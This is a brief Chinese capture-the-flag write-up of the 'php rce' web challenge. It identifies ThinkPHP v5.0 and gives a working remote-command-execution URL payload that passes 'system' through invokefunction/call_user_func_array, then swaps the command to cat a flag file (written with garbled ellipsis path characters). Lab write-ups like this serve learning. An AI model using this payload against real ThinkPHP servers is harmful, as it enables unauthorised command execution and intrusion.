攻防世界web进阶区之php rce
页面就只有这个,没啥其他的,F12,也没啥发现,bp抓包也没有,百度这个thinkphp v5.0版本,发现出过远程命令执行的漏洞
找了一下payload /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
漏洞链接没有flag,返回上一级,多次返回后,发现flag
在地址栏最后改为cat%20…/…/…/flag
发现flag